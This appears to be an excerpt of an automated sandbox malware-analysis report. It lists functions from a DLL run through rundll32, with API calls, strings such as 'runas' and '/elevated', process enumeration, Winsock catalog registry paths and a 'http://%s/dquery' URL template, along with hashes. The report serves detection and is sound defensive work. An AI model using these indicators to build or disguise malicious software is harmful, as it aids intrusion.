LoadLibraryExW.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A907
FindResourceW.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A91F
SizeofResource.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A933
LoadResource.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A942
LockResource.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A953
malloc.MSVCRT(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A964
memmove.MSVCRT(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A97B
FreeResource.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A983
FreeLibrary.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A98C
VerQueryValueW.VERSION(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A9B4
free.MSVCRT(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A9D9

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Resource$FreeLibraryLoad$FindLockQuerySizeofValuefreemallocmemmove
String ID:
API String ID: 3317409091-0
Opcode ID: d575d481ff84caad7d8740059adda23fe9f9648e66c4b8f54cfb60a62ec78070
Instruction ID: 8185c375a913dccbf35fde3c3455573a2fd048fb7f01b55c3a130ccbeb9ebe14
Opcode Fuzzy Hash: d575d481ff84caad7d8740059adda23fe9f9648e66c4b8f54cfb60a62ec78070
Instruction Fuzzy Hash: 09316B35606B4886EA86DF16AC0479AB3E4BB4DFC0F0A8426AE4907764EF3CD649C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180019044 Relevance: 16.6, APIs: 11, Instructions: 86libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 000000018001906D
FindResourceW.KERNEL32 ref: 0000000180019085
SizeofResource.KERNEL32 ref: 0000000180019099
LoadResource.KERNEL32 ref: 00000001800190A8
LockResource.KERNEL32 ref: 00000001800190B9
malloc.MSVCRT ref: 00000001800190CA
memmove.MSVCRT ref: 00000001800190E1
FreeResource.KERNEL32 ref: 00000001800190E9
FreeLibrary.KERNEL32 ref: 00000001800190F2
VerQueryValueW.VERSION ref: 000000018001911A
free.MSVCRT ref: 000000018001913F

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Resource$FreeLibraryLoad$FindLockQuerySizeofValuefreemallocmemmove
String ID:
API String ID: 3317409091-0
Opcode ID: c78e14dcb0124c7fdfddeb6e32502328b3625422cacc1ce2de84f055e235b1f2
Instruction ID: 7be624b5aba991f8dce8e488531e7c4bc30f0810fde0e2206e2c198a200c07cc
Opcode Fuzzy Hash: c78e14dcb0124c7fdfddeb6e32502328b3625422cacc1ce2de84f055e235b1f2
Instruction Fuzzy Hash: F5316D31702B448AEB87DF6AA84479977E0BB4CFD4F098425AE0907764EF38D64AC700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180066A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0000000180066A90
GetModuleFileNameW.KERNEL32 ref: 0000000180066AA1
GetCommandLineW.KERNEL32 ref: 0000000180066B41
memset.MSVCRT ref: 0000000180066B85
ShellExecuteExW.SHELL32 ref: 0000000180066BCC
CloseHandle.KERNEL32 ref: 0000000180066BE1

Strings

/elevated, xrefs: 0000000180066B55
runas, xrefs: 0000000180066B9B
MPR.dll, xrefs: 0000000180066AC1

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: memset$CloseCommandExecuteFileHandleLineModuleNameShell
String ID: /elevated$MPR.dll$runas
API String ID: 3400839104-479190379
Opcode ID: ff0e70aebe942903d03514da05f5171b976ef8719cbab5a1757af81890fa035d
Instruction ID: c5738ef19aefcfe0893ce15e6bbb4f81d570db0aa822fd902f1c1618a14612e4
Opcode Fuzzy Hash: ff0e70aebe942903d03514da05f5171b976ef8719cbab5a1757af81890fa035d
Instruction Fuzzy Hash: 35518F32611B4481EB919B29D85039A73A5FB88BF4F108316FABE437E4DF38C649C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180028C8C Relevance: 15.2, APIs: 10, Instructions: 235COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

StringFromGUID2.OLE32 ref: 0000000180028D17
_wcsupr.MSVCRT ref: 0000000180028D26
StringFromGUID2.OLE32 ref: 0000000180028DCA
_wcsupr.MSVCRT ref: 0000000180028DD8
StringFromGUID2.OLE32 ref: 0000000180028E38
_wcsupr.MSVCRT ref: 0000000180028E4A
StringFromGUID2.OLE32 ref: 0000000180028E84
_wcsupr.MSVCRT ref: 0000000180028E92
StringFromGUID2.OLE32 ref: 0000000180028EC4
_wcsupr.MSVCRT ref: 0000000180028ED5

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: FromString_wcsupr$HeapProcess
String ID:
API String ID: 2249050647-0
Opcode ID: af4d7778e813cec4d2260f242f830c925d5e0839e1a4af0d89802f64c8607ec2
Instruction ID: c2b84f69b377f8d486519554b3a5ef31eab8a077f1ecb1a3c09cbb62b7b5dce0
Opcode Fuzzy Hash: af4d7778e813cec4d2260f242f830c925d5e0839e1a4af0d89802f64c8607ec2
Instruction Fuzzy Hash: A5A19E36302A4881EBE79F15D8403E963A1FB58BD4F45C116EA5E5B6E9DF38CB89D300

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CE1C38 Relevance: 15.2, APIs: 10, Instructions: 234processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00000235B5CE1C72

Part of subcall function 00000235B5CEAD34: NtAllocateVirtualMemory.NTDLL ref: 00000235B5CEAD6A

Process32First.KERNEL32 ref: 00000235B5CE1CFC
Process32Next.KERNEL32 ref: 00000235B5CE1D1D
Process32First.KERNEL32 ref: 00000235B5CE1D49
Process32Next.KERNEL32 ref: 00000235B5CE1D96
Process32First.KERNEL32 ref: 00000235B5CE1DAD
wsprintfA.USER32 ref: 00000235B5CE1EF0
wsprintfA.USER32 ref: 00000235B5CE1F96
Process32Next.KERNEL32 ref: 00000235B5CE20D3
CloseHandle.KERNEL32 ref: 00000235B5CE20F0

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: Process32$FirstNext$wsprintf$AllocateCloseCreateHandleMemorySnapshotToolhelp32Virtual
String ID:
API String ID: 3605396869-0
Opcode ID: bb05992a4f7f9f49a53442d2e1aaa10a6dfd61868bba92c4a54245666e2faaf4
Instruction ID: 6cc24f0a57111a897920b33ed418f312049d8526b70dc45510200774df2fcbf2
Opcode Fuzzy Hash: bb05992a4f7f9f49a53442d2e1aaa10a6dfd61868bba92c4a54245666e2faaf4
Instruction Fuzzy Hash: B1D11B32248F9599EA74CB14E45439AF3A3F789388F801525E68E43AADDF3CD65DCB40

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800421D4 Relevance: 15.2, APIs: 10, Instructions: 163networkCOMMON

Download Yara Rule

APIs

??_V@YAXPEAX@Z.MSVCRT ref: 00000001800423F9

Part of subcall function 0000000180042FC4: WideCharToMultiByte.KERNEL32 ref: 0000000180042FFB
Part of subcall function 0000000180042FC4: ??_V@YAXPEAX@Z.MSVCRT ref: 0000000180043016
Part of subcall function 0000000180042FC4: WideCharToMultiByte.KERNEL32 ref: 000000018004306B

Part of subcall function 0000000180066050: EnterCriticalSection.KERNEL32 ref: 0000000180066098
Part of subcall function 0000000180066050: LeaveCriticalSection.KERNEL32 ref: 00000001800660E1

Part of subcall function 0000000180043154: ??_V@YAXPEAX@Z.MSVCRT ref: 0000000180043187
Part of subcall function 0000000180043154: htonl.WS2_32 ref: 00000001800431F3

??_V@YAXPEAX@Z.MSVCRT ref: 000000018004228E
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800422DA
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180042302
htons.WS2_32 ref: 000000018004234A
htonl.WS2_32 ref: 0000000180042358
htons.WS2_32 ref: 0000000180042366
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0000000180042385
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800423AB
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800423D3

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: ByteCharCriticalMultiSectionWidehtonlhtons$EnterLeavememmove
String ID:
API String ID: 505489203-0
Opcode ID: a07653937a79e70b2ab9cb09c4e22017cd899243124cbf7044e450a9eefd8b59
Instruction ID: 546e40b67bc81cdcf22b9085e67948acfa9500907e31d87aed3a5e4506fe483b
Opcode Fuzzy Hash: a07653937a79e70b2ab9cb09c4e22017cd899243124cbf7044e450a9eefd8b59
Instruction Fuzzy Hash: A6711C32B05B548AFB96CFA1E8403ED33B5B70879DF468025EE5627A98DF38C659C344

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180052280 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 220COMMON

Download Yara Rule

Strings

%s\NameSpace_Catalog5\Catalog_Entries64\%012d, xrefs: 0000000180052353
Num_Catalog_Entries, xrefs: 0000000180052346
Num_Catalog_Entries64, xrefs: 000000018005233F
%s\NameSpace_Catalog5\Catalog_Entries\%012d, xrefs: 000000018005235A, 0000000180052631
SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5, xrefs: 00000001800523AF

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID:
String ID: %s\NameSpace_Catalog5\Catalog_Entries64\%012d$%s\NameSpace_Catalog5\Catalog_Entries\%012d$Num_Catalog_Entries$Num_Catalog_Entries64$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5
API String ID: 0-1196714001
Opcode ID: 568fd741c3bdcc21c426c5afc4ac46b45918c5554304f1a676603b4f6589036a
Instruction ID: 902fc08f0a24e927d00bac490aa4b2e4fc0ab2cffff010c51715f7c20a33671b
Opcode Fuzzy Hash: 568fd741c3bdcc21c426c5afc4ac46b45918c5554304f1a676603b4f6589036a
Instruction Fuzzy Hash: 8B91E232701B4886EB96CB62A8407D973A0FB8DBD4F058225BF6D17795EF39CA49C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002C720 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 217COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

StringFromGUID2.OLE32 ref: 000000018002C7A1
_wcsupr.MSVCRT ref: 000000018002C7AF
SysFreeString.OLEAUT32 ref: 000000018002C8DA
??_V@YAXPEAX@Z.MSVCRT ref: 000000018002C8EC
??3@YAXPEAX@Z.MSVCRT ref: 000000018002C8FE
_wtoi.MSVCRT ref: 000000018002C9F2

Strings

internetshortcut, xrefs: 000000018002C96B
hotkey, xrefs: 000000018002C95A

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: String$??3@FreeFromHeapProcess_wcsupr_wtoi
String ID: hotkey$internetshortcut
API String ID: 2885337837-1159320594
Opcode ID: a2454b8e8b8246686a3b2ba7e9ac3c3560326eba55912cdd4e74c1efac8119ef
Instruction ID: 4557ede77b3344c9b7d134b2ef366cc1eba795b6e68afc4d6349487d3a9816dc
Opcode Fuzzy Hash: a2454b8e8b8246686a3b2ba7e9ac3c3560326eba55912cdd4e74c1efac8119ef
Instruction Fuzzy Hash: 56915972701B4886EB96DF69D84079D33A0F748BE4F44C626AA6D477E4DF38CA99C340

Uniqueness

Uniqueness Score: -1.00%

Function 000000018003AA00 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 156sleepthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000000018003AA41
Sleep.KERNEL32(?,?,?,?,00000000), ref: 000000018003AA64

Strings

JudgeVersion, xrefs: 000000018003AB6A

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CurrentSleepThread
String ID: JudgeVersion
API String ID: 1164918020-3141317846
Opcode ID: 2437360cf512e5b62a46a09ef29253c79db304fd769a9f3e4dce4e3854d29d87
Instruction ID: 47c15e1018a900855fb3b169089698e2b9417bb7c9542535bb0a2760737ebbf6
Opcode Fuzzy Hash: 2437360cf512e5b62a46a09ef29253c79db304fd769a9f3e4dce4e3854d29d87
Instruction Fuzzy Hash: EE51AB32604A889AFB979F65DD843DE73A1F3097D4F468525EA2A83790DF34CA99C340

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005E750 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152filesynchronizationCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32 ref: 000000018005E831
GetFileAttributesW.KERNEL32 ref: 000000018005E898
SetFileAttributesW.KERNEL32 ref: 000000018005E8B3
DeleteFileW.KERNEL32 ref: 000000018005E909
GetLastError.KERNEL32 ref: 000000018005E919
GetLastError.KERNEL32 ref: 000000018005E921
ReleaseMutex.KERNEL32 ref: 000000018005E936

Strings

PRAGMA synchronous = OFF;, xrefs: 000000018005E7E9, 000000018005E87B

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: File$AttributesDeleteErrorLast$MutexRelease
String ID: PRAGMA synchronous = OFF;
API String ID: 874664252-1854902270
Opcode ID: 1145e7b794f1c9dbefaeeafce65ce3907897fb728955ac70424f53ad1c5898c9
Instruction ID: fa77642fd0660764f5a509da37546a8681fbf34ddf7b90f5fa11f8d2a21f9c13
Opcode Fuzzy Hash: 1145e7b794f1c9dbefaeeafce65ce3907897fb728955ac70424f53ad1c5898c9
Instruction Fuzzy Hash: 6551A335700B8996FEDE8F6594517B92390AB4DBD4F048524BEAE677E0DF35CA098300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180044568 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00000001800445B0

Part of subcall function 00000001800463BC: ??2@YAPEAX_K@Z.MSVCRT ref: 00000001800463D3

GetTickCount.KERNEL32 ref: 000000018004461F
srand.MSVCRT ref: 0000000180044627
rand.MSVCRT ref: 000000018004462D
rand.MSVCRT ref: 0000000180044651
InitializeCriticalSection.KERNEL32 ref: 0000000180044763

Part of subcall function 000000018000AF68: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B026

Part of subcall function 000000018000AF68: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B04B

Part of subcall function 0000000180044810: DeleteCriticalSection.KERNEL32 ref: 000000018004483D
Part of subcall function 0000000180044810: ??3@YAXPEAX@Z.MSVCRT ref: 000000018004488A
Part of subcall function 0000000180044810: DeleteCriticalSection.KERNEL32 ref: 00000001800448AA

??3@YAXPEAX@Z.MSVCRT ref: 00000001800447A5

Strings

http://%s/dquery, xrefs: 00000001800446A3, 00000001800446F3

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: ??2@CriticalSection$??3@Deleterand$CountInitializeTickmemsetsrand
String ID: http://%s/dquery
API String ID: 3689213441-2489601265
Opcode ID: 3d6c1d3a1db6c1d00b31d5721a07cc2654ec57c957b64071c42c049315398c83
Instruction ID: 80c6b5da0a524930356cbb69355e12e6cacd4ac9a253962bc35af1aeed2dd264
Opcode Fuzzy Hash: 3d6c1d3a1db6c1d00b31d5721a07cc2654ec57c957b64071c42c049315398c83
Instruction Fuzzy Hash: F3619076211F4986E7829B64EC843D933A0FB497A8F518316ED29076E5EF78C78DC344

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005ECC0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 0000000180018E8C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,0000000180065B3D), ref: 0000000180018E96
Part of subcall function 0000000180018E8C: CreateFileW.KERNEL32(?,?,?,?,?,?,?,0000000180065B3D), ref: 0000000180018EC6
Part of subcall function 0000000180018E8C: DeviceIoControl.KERNEL32 ref: 0000000180018F04
Part of subcall function 0000000180018E8C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,0000000180065B3D), ref: 0000000180018F0F

memset.MSVCRT ref: 000000018005ED13
GetModuleFileNameW.KERNEL32 ref: 000000018005ED24

Part of subcall function 0000000180065EE4: PathFileExistsW.SHLWAPI ref: 0000000180065F00
Part of subcall function 0000000180065EE4: EnterCriticalSection.KERNEL32 ref: 0000000180065F2A
Part of subcall function 0000000180065EE4: LeaveCriticalSection.KERNEL32 ref: 0000000180065F73

GetModuleFileNameW.KERNEL32 ref: 000000018005ED55
PathAppendW.SHLWAPI ref: 000000018005ED69
PathFileExistsW.SHLWAPI ref: 000000018005EDD0

Strings

\deepscan\heavygate64.dll, xrefs: 000000018005EDBA
\Config\MessageCenter.db, xrefs: 000000018005ED93
\heavygate64.dll, xrefs: 000000018005EDEE

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: File$Path$CriticalExistsModuleNameSection$AppendCloseControlCreateCurrentDeviceEnterHandleLeaveProcessmemset
String ID: \Config\MessageCenter.db$\deepscan\heavygate64.dll$\heavygate64.dll
API String ID: 830827343-1853890022
Opcode ID: 298258ffcac91158a1fef4f3201ca6457f5d35ecb6e0b41006b5da1b8766b288
Instruction ID: ed8f6b5c495fe7c06dfc5e892af335cc1c0a2688f7bbfb93a7c5ae832a2d3b97
Opcode Fuzzy Hash: 298258ffcac91158a1fef4f3201ca6457f5d35ecb6e0b41006b5da1b8766b288
Instruction Fuzzy Hash: 12413B72214A8995EBB5DF21EC413D92360F7897C8F808112FA4D9B5A9DF39C70DCB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180004288 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00000001800042C6

Part of subcall function 0000000180001900: SHGetPathFromIDListW.SHELL32 ref: 000000018000190C

GetFileAttributesW.KERNEL32 ref: 00000001800042FA
memset.MSVCRT ref: 0000000180004316
ILCreateFromPath.SHELL32 ref: 0000000180004330
ILCombine.SHELL32 ref: 000000018000437A
CoTaskMemFree.OLE32 ref: 0000000180004387
CoTaskMemFree.OLE32 ref: 0000000180004394

Strings

:, xrefs: 00000001800042E7

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: FreeFromPathTaskmemset$AttributesCombineCreateFileList
String ID: :
API String ID: 2941325240-336475711
Opcode ID: b7718fc7bab466bf75feea53bf66271dcee3e8f8e01a932515278184e63cf5ba
Instruction ID: dc65f2bc49bddac93e31888ce9d3fd3537e0c7ef9c239f6ea7558133a88505f1
Opcode Fuzzy Hash: b7718fc7bab466bf75feea53bf66271dcee3e8f8e01a932515278184e63cf5ba
Instruction Fuzzy Hash: 7731747260458881EAB5DB16E4543ED7361FB8CBC4F44D115FA4E86AA5DF3CCB49C704

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180060A0C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 68COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0000000180060A59
GetClassNameW.USER32 ref: 0000000180060A6C
StrCmpIW.SHLWAPI ref: 0000000180060A8C
StrCmpIW.SHLWAPI ref: 0000000180060AAD
GetWindowTextW.USER32 ref: 0000000180060AC5
StrStrIW.SHLWAPI ref: 0000000180060AE0

Strings

Microsoft Edge, xrefs: 0000000180060AD4
ApplicationFrameWindow, xrefs: 0000000180060AA6

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: ClassNameTextWindowmemset
String ID: ApplicationFrameWindow$Microsoft Edge
API String ID: 1817102812-2764675319
Opcode ID: bdc5f29d5c31fe96e361a90c3735c845403ae182fb6ea73bd058871bc7ed945a
Instruction ID: cbb3fe303a1e4ce820f684c33e5910fd11efe3c021ca595ae8cabc946684c7f6
Opcode Fuzzy Hash: bdc5f29d5c31fe96e361a90c3735c845403ae182fb6ea73bd058871bc7ed945a
Instruction Fuzzy Hash: 3721943135478985FAA19F65E8843DA6361F78C7C4F648125AAAD872A4EF7CC74DC700

Uniqueness

Uniqueness Score: -1.00%

